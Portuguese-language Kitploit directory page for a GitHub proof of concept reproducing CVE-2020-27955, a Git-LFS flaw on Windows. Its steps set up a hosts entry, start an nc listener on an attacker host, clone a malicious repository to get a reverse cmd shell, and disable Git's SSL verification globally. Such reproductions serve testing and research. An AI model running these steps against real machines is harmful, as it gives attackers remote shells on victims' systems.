Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-27955 | Kitploit
Ferramentas/GitHubGitHub/z50913/cve-2020-27955
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoMovimento LateralTestes de PenetraçãoComando e Controle
GitHubz50913/cve-2020-27955

CVE-2020-27955

Ver Repositório
há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Reprodução da vulnerabilidade CVE-2020-27955

1、Baixe a versão vulnerável do Git-LFS na máquina Windows

Link para download: https://github.com/git-for-windows/git/releases/tag/v2.29.2.windows.1

2、Na máquina Windows, instale e adicione as seguintes informações ao arquivo hosts. 10.1.1.5 é o host onde o nc escuta na porta 8888 (pode substituir conforme necessário)

10.1.1.5 abcall.xyz

3、No host 10.1.1.5, inicie o nc escutando na porta 8888

┌──(root㉿hostname)-[~]

└─# nc

Cmd line: -l -p 8888

4、No prompt de comando (cmd) da máquina Windows, digite

git clone https://github.com/z50913/CVE-2020-27955.git

5、O host 10.1.1.5 obtém o shell do cmd da máquina Windows

#Outros Se houver erro de certificado SSL, execute primeiro o seguinte comando para desativar a verificação SSL e, em seguida, faça o clone novamente

git config --global http.sslverify false

Baixar ferramenta